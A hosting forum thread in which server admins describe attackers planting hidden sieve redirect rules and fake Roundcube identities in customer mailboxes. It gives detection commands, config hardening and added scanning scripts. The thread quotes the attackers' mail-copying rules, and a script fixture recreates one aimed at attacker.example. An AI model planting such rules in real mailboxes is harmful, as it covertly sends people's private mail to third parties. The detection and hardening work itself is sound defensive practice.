
Issue dovecot / roundcube sieve hack

tkalfaoglu

Silver Pleskian
Today a customer complained that their email might be compromised.
I found that a single email address had a sieve added:

.dovecot.sieve -> sieve/roundcube.sieve

and that file contained:
# rule:[.]
if allof (header :contains "from" "@")
{
redirect :copy "[email protected]";
}
require ["copy"];

PS: You may wish to do a check of your systems, just do a:

cd /var/qmail/mailnames
find . -name roundcube.sieve -exec echo grep redirect {} \;

My question was this: I guess they got the person's email address and using webmail, added a redirect. How can this be prevented?
Thanks, -tk
 
PS: this gmail email address appears in the whois registry of prornec.com which is located in Lagos, Nigeria!
 
PS: Looking at the PLESK mail accounts page, there appears to be NO redirect.
Perhaps PLESK should also check these sieve settings when it displays the list of emails, and not only the redirects that have been placed using the PLESK interface.
 
prornec.com domain was hosted in servers in Romania, with IP ranges of:
45.89.175.0 - 45.89.175.255
 
Sorry - the command should have been:

cd /var/qmail/mailnames
find . -name roundcube.sieve -exec grep redirect {} \;

the echo was my debug version :) -t
 
My question was this: I guess they got the person's email address and using webmail, added a redirect. How can this be prevented?
Have a look at the config file from Roundcube's managesieve plugin. There are some options that might prevent creating similar rules through Roundcube. The $config['managesieve_raw_editor'] and $config['managesieve_forward'] seem useful options to restrict in this regard.

Needless to say that it is always best to make every effort to protect user/email accounts so to prevent unauthorized access in the first place.
 
Many thanks. The forward option does not contain a disable option:

Code:
// Enables separate management interface for setting forwards (redirect to and copy to)
// 0 - no separate section (default),
// 1 - add Forward section,
// 2 - add Forward section, but hide Filters section
$config['managesieve_forward'] = 0;

In any case, I changed it to 2 and will check its impact. Likewise I'm going to disable the managesieve plugin.
 
I noticed the same issue with Horde as well. Someone hacked some people's ingo.sieve files to put redirects..
Nothing visible in the plesk interface, so I assume it was done via the horde interface.
 
We had the same issue. I highly recommend that everyone check their sieve files (.dovecot.sieve, roundcube.sieve, ingo.sieve); you can check with this simple line:

find /var/qmail/mailnames/ -type f -name '*sieve' | xargs grep 'copy'
or
find /var/qmail/mailnames/ -type f -name '*sieve' | xargs grep '@'

Notice: some of these filters can be user-set; check them with the users.


Sample of our findings:


#1

if allof (header :contains "subject" "@")
{
redirect :copy "[email protected]";
}
require ["fileinto"];
require "fileinto";

#2

if true
{
redirect :copy "[email protected]";
}
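
The scan below is an added example, not code from this thread or from Plesk: it does what the find/grep one-liners above do, but reports each redirect action together with the mailbox it belongs to and whether the target domain is hosted on the server, which is the list you need when checking filters with users. It assumes Plesk's /var/qmail/mailnames/<domain>/<user>/ layout and uses the top-level directory names as the local-domain list unless you pass one; the sample tree it builds is constructed data, not real findings.

```bash
#!/bin/sh
# Added example (not from the thread): list every sieve redirect under a
# mailnames tree with its owning mailbox, flagging targets outside the server.
# Assumes Plesk's /var/qmail/mailnames/<domain>/<user>/ layout.

# scan_sieve_redirects ROOT [LOCAL_DOMAINS]
#   ROOT           directory laid out like /var/qmail/mailnames
#   LOCAL_DOMAINS  space-separated domains hosted here; defaults to the
#                  top-level directory names under ROOT (domain aliases that
#                  have no mailnames directory will show as EXTERNAL, so review)
# Output, one line per redirect action:
#   <mailbox> <sieve file> <target address> <local|EXTERNAL>
scan_sieve_redirects() {
    root=$1
    local_domains=${2:-$(ls "$root")}
    find "$root" -type f -name '*.sieve' | while IFS= read -r file; do
        rel=${file#"$root"/}          # <domain>/<user>/...
        domain=${rel%%/*}
        rest=${rel#*/}
        user=${rest%%/*}
        # every quoted argument of a redirect action, with or without :copy
        # (a redirect split over several lines would be missed by this grep)
        grep -oE 'redirect[[:space:]]+(:copy[[:space:]]+)?"[^"]+"' "$file" 2>/dev/null \
            | sed -E 's/.*"([^"]+)"/\1/' \
            | while IFS= read -r target; do
                tdomain=${target##*@}
                status=EXTERNAL
                for d in $local_domains; do
                    [ "$tdomain" = "$d" ] && status=local
                done
                printf '%s@%s %s %s %s\n' "$user" "$domain" "$file" "$target" "$status"
            done
    done
}

# make_sample_tree DIR: constructed sample data for the demo, not real findings
make_sample_tree() {
    root=$1
    mkdir -p "$root/example.org/alice/sieve" "$root/example.org/bob/sieve" "$root/example.org/carol"
    # attacker-style rule like the one in the thread: copy all mail with an @ in From
    cat >"$root/example.org/alice/sieve/roundcube.sieve" <<'EOF'
# rule:[.]
require ["copy"];
if allof (header :contains "from" "@")
{
    redirect :copy "collector@attacker.example";
}
EOF
    # legitimate user forward to another mailbox on the same server
    cat >"$root/example.org/bob/sieve/roundcube.sieve" <<'EOF'
require ["fileinto"];
if header :contains "subject" "invoice" { fileinto "Invoices"; }
redirect "bob-archive@example.org";
EOF
    # Horde/ingo-style file with an unconditional copy
    cat >"$root/example.org/carol/ingo.sieve" <<'EOF'
require ["copy"];
if true
{
    redirect :copy "drop@mailbox.example";
}
EOF
}

# Demo on constructed data; on a Plesk host run instead:
#   scan_sieve_redirects /var/qmail/mailnames
demo_root=$(mktemp -d)
make_sample_tree "$demo_root"
scan_sieve_redirects "$demo_root"
rm -rf "$demo_root"
```

The output is a review list, not a verdict: bob's forward to bob-archive@example.org is reported as local and is probably fine, while the two EXTERNAL lines are the ones to confirm with the mailbox owners before removing the file and resetting the password.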
 
Just to document here in case anyone else is ever looking for the possibility to disable the redirect/copy to option in Roundcube.
I was looking into that, because these sieve redirects circumvent the SRS filter of Plesk and thus will cause SPF troubles.

in /usr/share/psa-roundcube/plugins/managesieve/config.inc.php add redirect to the managesieve_disabled_actions param, i.e.:
Code:
$config['managesieve_disabled_actions'] = ['redirect'];

I only fear that this config file may get overwritten on updates, so keep an eye out for that.
 
As an additional note, this only works for RC version 1.5 and up, which is currently not available on Plesk for CentOS 7.9 and Ubuntu 18.04.
 
Hi,

I'm bumping this thread because, in addition to the copy and redirect roundcube filters discussed here, I've come across another roundcube hack symptom: creating a new "fake" identity.

To check this you must log in to the plesk db:
Code:
plesk db;
use roundcubemail;
select user_id, changed, del,name, email from identities;

On the select output check the email column, it usually is an email not hosted on the server.
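
As an added example (not code from the post above or from Roundcube/Plesk), the check below extends the identities query: it joins each identity to the login that owns it via roundcubemail.users, then flags identities whose domain differs from the login's domain. Roundcube on Plesk logs users in with their full mail address, so a mismatch is usually an identity that was added to impersonate someone else. Soft-deleted rows (del = 1) are kept because an attacker may remove the identity after use. Running the query through "plesk db -Ne" is an assumption about the wrapper; the rows fed to the demo are constructed.

```bash
#!/bin/sh
# Added example (not from the thread): review Roundcube identities joined to the
# owning login and flag cross-domain ones. Soft-deleted rows (del=1) stay visible.

# Query for the live system. The join is standard Roundcube schema
# (identities.user_id -> users.user_id); piping it through "plesk db -Ne" is an
# assumption about Plesk's mysql wrapper:
#   plesk db -Ne "$RC_IDENTITY_QUERY" | flag_identities
# name is selected last because it may be empty and would otherwise shift columns.
RC_IDENTITY_QUERY="SELECT u.username, i.email, i.changed, i.del, i.name
FROM roundcubemail.identities i
JOIN roundcubemail.users u ON u.user_id = i.user_id
ORDER BY i.changed DESC"

# flag_identities
#   reads tab-separated rows "login email changed del name" on stdin, prints one
#   SUSPECT line per identity whose domain differs from the login's domain, and
#   returns the number of suspects (0 = nothing to review)
flag_identities() {
    suspects=0
    while IFS="$(printf '\t')" read -r login email changed del name; do
        [ -n "$login" ] || continue
        if [ "${email##*@}" != "${login##*@}" ]; then
            printf 'SUSPECT %s has identity %s (changed %s, del=%s, name="%s")\n' \
                "$login" "$email" "$changed" "$del" "$name"
            suspects=$((suspects + 1))
        fi
    done
    return $suspects
}

# sample_rows: constructed rows in the shape the query returns, not real data
sample_rows() {
    printf '%s\t%s\t%s\t%s\t%s\n' \
        alice@example.org alice@example.org '2024-01-02 10:00:00' 0 'Alice' \
        alice@example.org support@attacker.example '2024-05-06 03:14:00' 0 'Alice (support)' \
        bob@example.org bob@example.org '2024-01-02 10:00:00' 0 '' \
        carol@example.org paypal-billing@mailbox.example '2024-05-06 03:20:00' 1 'Billing'
}

# Demo: two SUSPECT lines, then the count
sample_rows | flag_identities || echo "$? identity rows to review"
```

Treat a cross-domain identity on a server that hosts several of the same customer's domains as a prompt to ask, not as proof; the changed timestamp usually lines up with the webmail login that created it.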
 
Yes, sadly identity creation is unrestricted in Roundcube by default. You can restrict the creation of additional identities in Roundcube with the $config['identities_level'] option using a value of either 3 or 4 in the config.inc.php file.

All config options for identities_level are explained here:
 
Didn't know this option, perfect!

Also, I would recommend turning on the userlogins option: $config['log_logins'] = true;
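
Since the posts above worry that Plesk updates may rewrite these config files, here is an added example (not code from the thread, Plesk or Roundcube) that re-checks the three hardening settings discussed: redirect listed in managesieve_disabled_actions, identities_level 3 or 4 (single identity, address not editable) and log_logins true. The managesieve plugin path /usr/share/psa-roundcube/plugins/managesieve/config.inc.php is from the thread; the main config path /usr/share/psa-roundcube/config/config.inc.php is an assumption, and the two sample configs are constructed.

```bash
#!/bin/sh
# Added example (not from the thread): audit Roundcube hardening settings so a
# config rewritten by an update is noticed. Run e.g. from cron:
#   audit_roundcube_config /usr/share/psa-roundcube/config/config.inc.php \
#       /usr/share/psa-roundcube/plugins/managesieve/config.inc.php
# (main config path assumed; plugin path taken from the thread)

# rc_setting FILE KEY
#   prints the right-hand side of the last active "$config['KEY'] = ...;" line
#   in FILE; lines commented out with // do not match; empty if unset
rc_setting() {
    grep -E "^[[:space:]]*\\\$config\['$2'\][[:space:]]*=" "$1" 2>/dev/null \
        | tail -n 1 \
        | sed -E 's/^[^=]*=[[:space:]]*//; s/;[[:space:]]*$//'
}

# audit_roundcube_config MAIN_CONFIG MANAGESIEVE_CONFIG
#   prints PASS/FAIL per setting, returns the number of failures
audit_roundcube_config() {
    main_cfg=$1
    sieve_cfg=$2
    failures=0

    actions=$(rc_setting "$sieve_cfg" managesieve_disabled_actions)
    case $actions in
        *"'redirect'"*) printf 'PASS managesieve_disabled_actions = %s\n' "$actions" ;;
        *) printf 'FAIL managesieve_disabled_actions = %s (redirect allowed)\n' "${actions:-<unset>}"
           failures=$((failures + 1)) ;;
    esac

    level=$(rc_setting "$main_cfg" identities_level)
    case $level in
        3|4) printf 'PASS identities_level = %s (extra identities blocked)\n' "$level" ;;
        *) printf 'FAIL identities_level = %s (users may add identities)\n' "${level:-<unset, default 0>}"
           failures=$((failures + 1)) ;;
    esac

    logins=$(rc_setting "$main_cfg" log_logins)
    case $logins in
        true) printf 'PASS log_logins = true\n' ;;
        *) printf 'FAIL log_logins = %s\n' "${logins:-<unset, default false>}"
           failures=$((failures + 1)) ;;
    esac
    return $failures
}

# write_sample_configs DIR: constructed weak and hardened configs for the demo
write_sample_configs() {
    cat >"$1/weak.php" <<'EOF'
<?php
// constructed sample: Roundcube defaults
$config['managesieve_disabled_actions'] = [];
$config['managesieve_forward'] = 0;
$config['identities_level'] = 0;
$config['log_logins'] = false;
EOF
    cat >"$1/hardened.php" <<'EOF'
<?php
// constructed sample: values recommended in this thread
$config['managesieve_disabled_actions'] = ['redirect'];
$config['managesieve_forward'] = 0;
// $config['identities_level'] = 0;   old value, commented out and ignored
$config['identities_level'] = 3;
$config['log_logins'] = true;
EOF
}

# Demo on the constructed files (one file stands in for both configs)
d=$(mktemp -d)
write_sample_configs "$d"
audit_roundcube_config "$d/hardened.php" "$d/hardened.php"
audit_roundcube_config "$d/weak.php" "$d/weak.php" || echo "weak config: $? problem(s)"
rm -rf "$d"
```

A nonzero exit is the signal to re-apply the settings; remember that managesieve_disabled_actions only takes effect on Roundcube 1.5 and later, as noted above.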
 